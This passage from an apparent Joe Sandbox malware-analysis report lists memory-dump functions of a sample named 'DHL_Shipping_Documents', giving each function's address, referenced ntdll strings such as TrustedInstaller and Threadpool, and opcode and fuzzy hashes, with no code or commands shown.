String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 79b4f8226281f5f8dbb1edd6ab832d5433b256f2d21b5b1ece0ad442d13ca036
Instruction ID: 457fb86451faf56e8451eb0bf78b99f7002ce08e59fa25a4a6f2e118bdbcae0d
Opcode Fuzzy Hash: 79b4f8226281f5f8dbb1edd6ab832d5433b256f2d21b5b1ece0ad442d13ca036
Instruction Fuzzy Hash: AE51AE716047029FDB25DF29C4646A7BBE4AF95300F50893EFAE987361E730E509CB92

Uniqueness

Uniqueness Score: -1.00%

Function 014DA223 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 014DA269
RtlpResUltimateFallbackInfo Enter, xrefs: 014DA25B

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: fbeb28475f58e0de57a3ab0cc0847bf0dfa23fcce17e5f62970090cb8fff5545
Instruction ID: 247d15d4cabce522c5907051df64216004baae3c78aaa19cb37ef03c1012d62d
Opcode Fuzzy Hash: fbeb28475f58e0de57a3ab0cc0847bf0dfa23fcce17e5f62970090cb8fff5545
Instruction Fuzzy Hash: A141DC31B00641DBDB26CF6AC4A4B6E7BB0FF94700F2440AAE900DB3A1E7B5D901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0150A590 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0150A5A4
Threadpool!, xrefs: 0150A5A9

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 65001a30e26faa32f76edf98aa47c8c2bd935849ebeda97c0f154c1c5086fb93
Instruction ID: ceeebd0fe7f80fce540c9840b7186509ac4410aa59d8f41557dda32e272574da
Opcode Fuzzy Hash: 65001a30e26faa32f76edf98aa47c8c2bd935849ebeda97c0f154c1c5086fb93
Instruction Fuzzy Hash: 6601ADB2640B00AFE312DF54CE05F2677F8F790715F018929A658CF190E374D944CB46

Uniqueness

Uniqueness Score: -1.00%

Function 014DC720 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 014DC823, 014DC9A0

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: de7918eb8fa9629bc715aabc4b945eaa40df4de3b300f1b650632d026ca60c48
Instruction ID: f824ed55b3243bfbb6a7bf9b4e7734d631ada1741a7b730708f1961a9f390976
Opcode Fuzzy Hash: de7918eb8fa9629bc715aabc4b945eaa40df4de3b300f1b650632d026ca60c48
Instruction Fuzzy Hash: 44826F75E002198FDF25CFA9C8A4BEEBBB1FF45710F14816AD919AB3A1D7309941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0156C900 Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

w, xrefs: 0156CD18

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 3c8f9fc5d1b690c12d390deb1d3b74b941ccc6a7dfa80299a604b2ab88a1ac84
Instruction ID: d9c5af0dc8f117b6b26baef2c73b2d4a0111af4e367b5ee0c956d1b2292f67d1
Opcode Fuzzy Hash: 3c8f9fc5d1b690c12d390deb1d3b74b941ccc6a7dfa80299a604b2ab88a1ac84
Instruction Fuzzy Hash: CED1AD70A0025AABEB24CF59C481ABEFBF9FF44704F14845AE8D99B241E335E991D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 01574904 Relevance: 1.5, Strings: 1, Instructions: 271COMMON

Download Yara Rule

Strings

@, xrefs: 015749C4

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 97cca61f0118c723889946034e87ed0acf0a0315205f161e2eada54e675d4ad7
Instruction ID: c3f61f7fc659c636cc627772bf4620de21e3c0885a2d89cc5224dcba5050cf0d
Opcode Fuzzy Hash: 97cca61f0118c723889946034e87ed0acf0a0315205f161e2eada54e675d4ad7
Instruction Fuzzy Hash: 4DA17F75E0020A9FEF15DF98D882BBEBBB9FF58740F14406AEA05AB250E7719D40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 015560E0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01556281

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 846f9de3d18ce536676e09e05fa076f697acad1d9c633c19b61f5fd919a09f7f
Instruction ID: 9f19497841d0db342b079287878bce92cd36d6f0e90756fb70fb9d4b2ac1e7a0
Opcode Fuzzy Hash: 846f9de3d18ce536676e09e05fa076f697acad1d9c633c19b61f5fd919a09f7f
Instruction Fuzzy Hash: E4918371A0025AAFEB21DF95CC95FAE7BB8FF14750F10005AFB04AF2A1D6759900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0150A620 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 015466AF

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: dedbf8181cc852ce83fa65058e6b9f026f19b1287aa18b8efc51617adcbd844f
Instruction ID: fdaf261ff6f7b390fa04ec05e9ba3a34de3d99ee80e54d6c981c023592c28152
Opcode Fuzzy Hash: dedbf8181cc852ce83fa65058e6b9f026f19b1287aa18b8efc51617adcbd844f
Instruction Fuzzy Hash: E4717A75E0021A8FDF28CF98D490BEDBBB1BF99304F14812EE905AB241E7319841CB64

Uniqueness

Uniqueness Score: -1.00%

Function 01574648 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 0157474F

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 026fa820781e90e465b8887ba605d68055355947396ed3977efa5d8681022263
Instruction ID: 191dc87145c06b57103a296fd626d1381e50f2a912844b5d50adbdb3866736f1
Opcode Fuzzy Hash: 026fa820781e90e465b8887ba605d68055355947396ed3977efa5d8681022263
Instruction Fuzzy Hash: 2B518571D0122ADBDF11DFA9D941AAEBBF5BF58B10F05412AEA11BF250D7349901CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 014EE577 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 014EE5F4

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 0fa44f53bee0d5ae88d94804286ea5c89a37826eef6f661499bc833179f7d3fc
Instruction ID: da3a0dcd5d86e145b5bb051167ff0ef07007da36469d8a2d164fd872e6e68572
Opcode Fuzzy Hash: 0fa44f53bee0d5ae88d94804286ea5c89a37826eef6f661499bc833179f7d3fc
Instruction Fuzzy Hash: BD41A2725083029BD711DA75C848B6BB7D8AFD8715F84096FF548E72A0E774D904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0150424B Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 015042B0

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 2dba6c1be9cacb8ff399f37c6a42d132e3d3fe55dd0bc331e6b021987c003d8d
Instruction ID: 410222101f1bdba84ffe515ded05e66de52a8251a827604a8298935e79f2b6b2
Opcode Fuzzy Hash: 2dba6c1be9cacb8ff399f37c6a42d132e3d3fe55dd0bc331e6b021987c003d8d
Instruction Fuzzy Hash: EC51AF71504711AFD321CF59C841A6BBBF9FF88710F00892EFA959B6A0E774E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0154C3F0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0154C43F

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: e22db607d28fbefc6149741fac469bd7b8c019c0a4e492c3264334ecbb08aa73
Instruction ID: c4d331e0097724c7883548ede6fa94cdc7366acc31bf701d85c97bf6e0db12d9
Opcode Fuzzy Hash: e22db607d28fbefc6149741fac469bd7b8c019c0a4e492c3264334ecbb08aa73
Instruction Fuzzy Hash: CD4122F1D0152A9BEB21DA50CC84FDEB77CBB94758F0045A5E708AF141DB709E898FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0154C960 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

TrustedInstaller, xrefs: 0154C97B

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: TrustedInstaller
API String ID: 0-565535830
Opcode ID: d2015ab2387458e85fa9179738273ad2c2ae288e035176ddebb3633cd3894d15
Instruction ID: 51809ba2b553386805694e2a8ce19af3e8cd4b43f56b126530658f30a1d91430
Opcode Fuzzy Hash: d2015ab2387458e85fa9179738273ad2c2ae288e035176ddebb3633cd3894d15
Instruction Fuzzy Hash: 98317372941619BFDB22DA95CC44FAEBBB9FB94B54F00046ABA00AF160D770DE41C790

Uniqueness

Uniqueness Score: -1.00%

Function 01566820 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01566871

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: c3e6ed799e13213fc67add10fba0806c16f3eec9d36e983f71156bb0495bcf11
Instruction ID: ad396901352b13c28ddac0563dd11cb9137ba3599350f6fe26d452e6b17011e3
Opcode Fuzzy Hash: c3e6ed799e13213fc67add10fba0806c16f3eec9d36e983f71156bb0495bcf11
Instruction Fuzzy Hash: B3311671A006499AEB22CE69C854BEEBBFCBF45704F14402CED40AF282D775E905CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0154C732 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0154C762

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 6939de4c9e699975c0edeb35126718d81abd5d1902ad8a3a686321ceebdea2a7
Instruction ID: d6e7cc69d3e2567f09f78e3f3e6c26ac5ee60872e8ac96763ac7adeda22f3629
Opcode Fuzzy Hash: 6939de4c9e699975c0edeb35126718d81abd5d1902ad8a3a686321ceebdea2a7
Instruction Fuzzy Hash: 9731DF3690251AAFEB16DA59C845E6FBBB4FBC1728F11856DE901AB290D730DE00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0156AB90 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0156AC0F

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 0e41cccabeea70ddff87dc72b8da39b5390e573cebbb1c8b600a7b3bb1db9864
Instruction ID: fcb373c2e5914a97813d668f82220b3a1dcd7c48fdc3dc9b278d6f0882d628f9
Opcode Fuzzy Hash: 0e41cccabeea70ddff87dc72b8da39b5390e573cebbb1c8b600a7b3bb1db9864
Instruction Fuzzy Hash: 2D3149B2A00645AFE721DF58CD45F5EBBB9FB84B10F158629F914AF694D734A800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015585EA Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0155861E

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 227b84e7322833eb169bc767170ac024cf5ff049d234e5f371a411b173994574
Instruction ID: 7001a4b96966c173945be5b5a0bde4519ac98e6b17f41d90bb91a41f7deb77d6
Opcode Fuzzy Hash: 227b84e7322833eb169bc767170ac024cf5ff049d234e5f371a411b173994574
Instruction Fuzzy Hash: 8101F7313006019FE7A15E9798A4F6A7BA6FFA1A54F04042FF9061E161CB20A845D774

Uniqueness

Uniqueness Score: -1.00%

Function 014E2790 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed2e78a1d3df752199abcd5578a8dd2d3dd1dd2bcaf67d1d296247a55d26c6e
Instruction ID: 142ffd3830ea58aa04845e03c4a5fb18e897e26fd6861ad7b50634a6547aba9c
Opcode Fuzzy Hash: 6ed2e78a1d3df752199abcd5578a8dd2d3dd1dd2bcaf67d1d296247a55d26c6e
Instruction Fuzzy Hash: 6B32BB70A0065AAFEB25CF69C854BBEBBF2BFC4300F24452DD4469F285D775AA42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014D69B0 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7937164c00eec12597d5818c8ab4494939b0814591dbf24925bf1443e099fd93
Instruction ID: 596bb971641fa6d71a86f1fb77d8559c892242453bf6c9aa0fd12fb827f48cf6
Opcode Fuzzy Hash: 7937164c00eec12597d5818c8ab4494939b0814591dbf24925bf1443e099fd93
Instruction Fuzzy Hash: 0E328C71A00615CFDF25CFA9C490AAEB7F1FF88300F15856AE956AB3A1D734E842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 014F4995 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80beed7934ce2fcb08ae216142db79a503349d0cda5f15a5529b2ca5d5d4ab60
Instruction ID: e3a408e83e3865b546f0e4623e82c53b45f04aabbed52a3511679215bb67314b
Opcode Fuzzy Hash: 80beed7934ce2fcb08ae216142db79a503349d0cda5f15a5529b2ca5d5d4ab60
Instruction Fuzzy Hash: 72F15F71E0061A9BDB15CF99C480BAFBBF5BF48710F09816EEA05AB361EB74D841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0156860B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0dd3ed0798b8adf3475eda24429ddaf055abb9b631d9880323278e4b1c4760
Instruction ID: 354a5480fab835a97ba78797e37f25055a3541ab8aeb14840f37aceedb287d38
Opcode Fuzzy Hash: 4b0dd3ed0798b8adf3475eda24429ddaf055abb9b631d9880323278e4b1c4760
Instruction Fuzzy Hash: 0FD1C271A0070A8FDF15CF68C841AFEB7F9BF88314F188569D955EB241D73AE9058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 014D6530 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae58e52b860e7c6c5099c16bcb416107db1465079147184823b0529c97d584f3
Instruction ID: 3b8e1be26cc644b845745cc871614eabf6f0b544d7d22b74e13d23415125d824
Opcode Fuzzy Hash: ae58e52b860e7c6c5099c16bcb416107db1465079147184823b0529c97d584f3
Instruction Fuzzy Hash: AAE17F71609342CFCB15CF28C1A0A6BBBE1FF89314F06896EE59987361D731E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 014C8347 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42e7b14e8edadbb5e995228007ab12c3a4733f3fdd6e3485399c90f693dd7ae
Instruction ID: 327ad20e94d0ca37791384f11a507bb4ea0750e8e372f3034ba0b9570b520f09
Opcode Fuzzy Hash: e42e7b14e8edadbb5e995228007ab12c3a4733f3fdd6e3485399c90f693dd7ae
Instruction Fuzzy Hash: 73D10476B002179BDB54CF69C880ABEB7A5BF54B04F05452EE916DF2A1FB30E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01566B00 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98060daddc1225c0e8fc1680376c793989278e0adf7a17c71f4c3c42c0ee3f1f
Instruction ID: d4c5a1e4cccaa0983b3de8f35eb7866f5aec53098ac907e088541da37fdf3525
Opcode Fuzzy Hash: 98060daddc1225c0e8fc1680376c793989278e0adf7a17c71f4c3c42c0ee3f1f
Instruction Fuzzy Hash: 66E14B70D0025A9FDF15CFA9C990AAEFBF9BF49304F148199E854EB245E335D981CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 014E0485 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 789a2d7b35ab04478af3741418e2ef35a2bdc15300226de7f0b80950e7a7b08a
Instruction ID: c393ed7f627972ae86c814a1cb8a7cc7c2658fc8ed6805cad9eaf3521e29c972
Opcode Fuzzy Hash: 789a2d7b35ab04478af3741418e2ef35a2bdc15300226de7f0b80950e7a7b08a
Instruction Fuzzy Hash: 6CB115317006469FDB22CBA9C854B7EBBF6BF84200F18056AE665DF391D770E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014D8320 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86eaef479fcd02961556d5d092f0186c665019693469f0590719e106540285bc
Instruction ID: dd18b73f4e5f8c50762fe1580317fad7b96f82d19c1ad89fb369ad55f8ee7c48
Opcode Fuzzy Hash: 86eaef479fcd02961556d5d092f0186c665019693469f0590719e106540285bc
Instruction Fuzzy Hash: D0C139741083418FD764CF19C494BABB7E4BF98304F44496EE9998B3A1E774E909CF92

Uniqueness

Uniqueness Score: -1.00%

Function 014CC3C7 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c5ad2673ccfe82bb5be5c9d542cc8ccb0d1e05273eca62e7e36832782ddeef
Instruction ID: b65df04411612e3d31affe0c9aa5328db73e71b7e31e5ecc726a8903132d692b
Opcode Fuzzy Hash: 29c5ad2673ccfe82bb5be5c9d542cc8ccb0d1e05273eca62e7e36832782ddeef
Instruction Fuzzy Hash: 25B18174A002668BDB64DF59C890BAAB7F1BF54700F0485EED50EEB391EB349D85CB20

Uniqueness

Uniqueness Score: -1.00%

Function 014FE597 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b659b18622aaf45eb15ebfba2b54c56c9b9f845d68094738ea5745a5bea414
Instruction ID: 456684b41f7516af2eb14cd1a11173b1b60adf6fc476a018709552548ef506d7
Opcode Fuzzy Hash: b6b659b18622aaf45eb15ebfba2b54c56c9b9f845d68094738ea5745a5bea414
Instruction Fuzzy Hash: 98A13A71E0021AAFEB22CB58C854BAE7BB0BB44714F06011BEA15BF3E0D7749D41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 01510145 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5f8f0d3d4d14a8f3580ee74242b8e335dda6fdf8d0cd335efc67c4404e10d3
Instruction ID: a1f497ff99e0c14d62f30f7ab834cce0981f3cd31248a597aba2df69965298c6
Opcode Fuzzy Hash: 0a5f8f0d3d4d14a8f3580ee74242b8e335dda6fdf8d0cd335efc67c4404e10d3
Instruction Fuzzy Hash: D9A1D270B006069FEB26CF69C581BAFB7B1FF54318F10452AE9159F285DB74E841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015A41C0 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59a9754f9bbb5850641f88183dd67132defb99c68a5a324163cf0374f225acb
Instruction ID: 8f2af8580dd6765d3a29ba4378ff10061f4f7f4cdf3da9b72e93e672d4c71b18
Opcode Fuzzy Hash: f59a9754f9bbb5850641f88183dd67132defb99c68a5a324163cf0374f225acb
Instruction Fuzzy Hash: 41A1DD726446029FD712DF58C980B2EBBE9FF58704F89092DF1869F621D3B0E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015A2817 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a0fb002090a8e71dec6ad10e1030cb3bf6a844ecbc22dd515538f060ef64ec
Instruction ID: b383e212f2978f27e41797b99a3f558f56b68392fac92ba4ee1afb9adba39591
Opcode Fuzzy Hash: 67a0fb002090a8e71dec6ad10e1030cb3bf6a844ecbc22dd515538f060ef64ec
Instruction Fuzzy Hash: 13B15871E4061ADFDF29CFA9C891AADBBF5FF48300F548129E915AB350D7B0A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014EE340 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6474d8354bf017713800efc958cb1db8761d139eef86466fbe7830f468e6573
Instruction ID: 3d96188e0a73faf2bee1a21575721b89a07d18d70b8b99fa8499c7144b43e7e0
Opcode Fuzzy Hash: b6474d8354bf017713800efc958cb1db8761d139eef86466fbe7830f468e6573
Instruction Fuzzy Hash: F1912672A00616CFDB24DB59C848B7EBBE1FF94716F05406AEA05AF3A0D774D942C790

Uniqueness

Uniqueness Score: -1.00%

Function 01526A7E Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2dadd9decaf52684f9438c1f6b8f0c66a7edb0c2eb5bb7ad9b4d5e4d899f171
Instruction ID: d8f1c2d7d3275c6a3435361e2e9261748459d9ec86ebdbf4265cddbdec577446
Opcode Fuzzy Hash: d2dadd9decaf52684f9438c1f6b8f0c66a7edb0c2eb5bb7ad9b4d5e4d899f171
Instruction Fuzzy Hash: 20818572E006269FDB15DF69C980ABEBBF4FB49700F04452EE845EB680E734D941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0159A800 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

